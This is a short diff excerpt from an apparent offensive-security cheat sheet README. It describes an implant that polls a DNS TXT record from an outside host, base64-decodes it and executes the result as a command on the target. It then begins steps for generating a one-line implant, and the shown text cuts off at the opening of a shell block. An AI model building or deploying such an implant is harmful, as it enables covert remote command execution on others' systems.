hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 - Requests a DNS TXT record every 60 minutes (from b00m2.team-teso.net).
 - Base64-decodes the TXT record and executes the command on the target. (the test command creates /tmp/.b00m).

-1. Modify the following to your liking and then Cut & Paste it to generate the 1-line implant.
+1. Generate a 1-line implant:

 ```shell
 base64 -w0 >x.txt <<-'EOF'